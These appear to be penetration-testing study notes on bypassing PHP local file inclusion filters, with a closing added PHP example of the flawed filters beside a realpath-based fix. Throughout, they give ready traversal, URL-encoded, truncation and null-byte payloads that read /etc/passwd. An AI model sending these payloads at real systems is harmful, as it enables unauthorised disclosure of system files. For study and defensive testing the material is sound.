BASIC BYPASSES

#non-recursive path traversal filters
$language = str_replace('../', '', $_GET['language']);

 * this "search and replace" filter is the most basic filter against LFI
    - it is supposed to remove every occurrence of the ../ substring
    - it is easy to bypass because str_replace makes a single pass and the
      filter is never applied again to its own output, so a string that still
      contains ../ after the first match is stripped gets through
       - bypasses include: ....// ..././ ....\/ or ....////
       
#approved paths
if(preg_match('/^\.\/languages\/.+$/', $_GET['language'])) {
    include($_GET['language']);
} else {
    echo 'Illegal path specified!';                   <----------indicator
}

BYPASS: VIA NON-RECURSIVE PATH TRAVERSAL FILTER

this method is used when the target has a filter in place that removes "../" from user input

root@oco:~$ BROWSER > {targetSite:port}/index.php?language=../../../../etc/passwd
 
 * if an error is displayed or nothing seems to work, the back-end may have a
   path traversal filter configured, such as
   $language = str_replace('../', '', $_GET['language']);
    - in cases like this you may be able to bypass it with ....// etc., which
      still contains ../ once the filter has removed its single match
 
 root@oco:~$ BROWSER > {targetSite:port}/index.php?language=....//....//....//....//etc/passwd
 root:x:0:0:root:/root:/bin/bash
 backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
 ...

BYPASS: VIA URL ENCODING

this method is used when the target has filters in place that disallow the "." or "/" characters in user input

root@oco:~$ burpsuite
BURP > Decoder
 input: ../../../../etc/passwd
 encode as: URL
 output: %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
 
root@oco:~$ BROWSER > {targetSite:port}/index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
 * the vulnerable application decodes the payload before including it, so the characters the filter blocked are restored

BYPASS: VIA APPROVED PATHS

this method is used when the webapp uses regular expressions to ensure that the file being included is under a specific path (e.g., ./languages); the regex only checks how the string starts, so traversal after the approved prefix is still accepted

root@oco:~$ BROWSER > {targetSite:port}/index.php?language=./languages/../../../../etc/passwd

CHAINED BASIC BYPASS TECHNIQUE

this method is used when the web application applies multiple filters at once, such as "approved paths", "disallowing file inclusion characters" and "path traversal filters". attackers may be able to bypass them by combining the basic bypass techniques: start with the approved path, then use a URL-encoded or recursive payload for the traversal part

root@oco:~$ BROWSER > {targetSite:port}/index.php?language=languages/....//....//....//....//etc/passwd
 * this technique combines an approved path with the non-recursive filter bypass
    - approved path plus URL encoding could also have been used

BYPASS: APPENDED EXTENSION

some webapps append an extension to the input string to ensure that the file being included has the expected extension (e.g., .php).

VIA PATH TRUNCATION

this only works with PHP versions before 5.3/5.4. for the technique to work, attackers need to start the path with a non-existing directory and the payload must reach a total length of 4096 characters, so that only the appended .php extension gets truncated and not the requested file at the end of the string (e.g., /etc/passwd)

root@oco:~$ echo -n "non_existing_directory/../../../etc/passwd/" && for i in {1..2048}; do echo -n "./"; done

root@oco:~$ BROWSER > {targetSite:port}/index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]

VIA NULL BYTES

PHP versions before 5.5 are vulnerable to null byte injection: adding a null byte (%00) at the end of the string terminates it, and anything after it is ignored. this works because of how strings are stored in low-level memory, where a null byte marks the end of the string, as in Assembly, C or C++.

root@oco:~$ BROWSER > {targetSite:port}/index.php?language=/etc/passwd%00
 *  the application appends .php, giving /etc/passwd%00.php; anything after the
    null byte (%00) is truncated, so the path actually used is /etc/passwd,
    bypassing the appended extension.
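added example, not from these notes: the str_replace and regex filters from the BASIC BYPASSES section run against the payloads above, beside a canonicalising check that rejects them (and the null byte / extension tricks). assumed names: naiveFilter, prefixFilter, resolveLanguage, a ./languages directory and the appended .php extension.

```php
<?php
// Added example (not from these notes): the two filters quoted in BASIC BYPASSES
// beside a canonicalising check. Assumed layout: language files live under a
// constructed ./languages directory and the application appends ".php".
// Filter 1 from the notes: one non-recursive pass of str_replace. "....//"
// loses a single "../" and is left as "../", so traversal survives the filter.
function naiveFilter(string $input): string
{
    return str_replace('../', '', $input);
}

// Filter 2 from the notes: prefix regex. It only constrains how the string
// starts, so "./languages/../../../../etc/passwd" is accepted.
function prefixFilter(string $input): bool
{
    return preg_match('/^\.\/languages\/.+$/', $input) === 1;
}

// Hardened check: resolve the final path, then compare it with the allowed
// directory. realpath() collapses "..", "./", doubled slashes and symlinks and
// returns false for files that do not exist, so padding cannot shed the extension.
function resolveLanguage(string $input, string $baseDir): ?string
{
    if (strpos($input, "\0") !== false) {   // null bytes never belong in a name
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $input . '.php');
    if ($candidate === false) {
        return null;
    }
    // Compare with the trailing separator so "languages_old" is not a match.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($candidate, $prefix, strlen($prefix)) === 0 ? $candidate : null;
}
// Constructed payloads, taken from the bypass sections above.
$payloads = [
    '../../../../etc/passwd',
    '....//....//....//....//etc/passwd',
    './languages/../../../../etc/passwd',
];
foreach ($payloads as $p) {
    printf("%-38s naive=%-24s prefix=%-8s resolved=%s\n", $p, naiveFilter($p),
        prefixFilter($p) ? 'accepted' : 'rejected',
        resolveLanguage($p, __DIR__ . '/languages') ?? 'rejected');
}
```

the first two columns show each filter letting a traversal through (naive leaves ../ behind, prefix accepts the ./languages/ prefix), while resolveLanguage rejects every payload because the resolved file is not under the languages directory.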
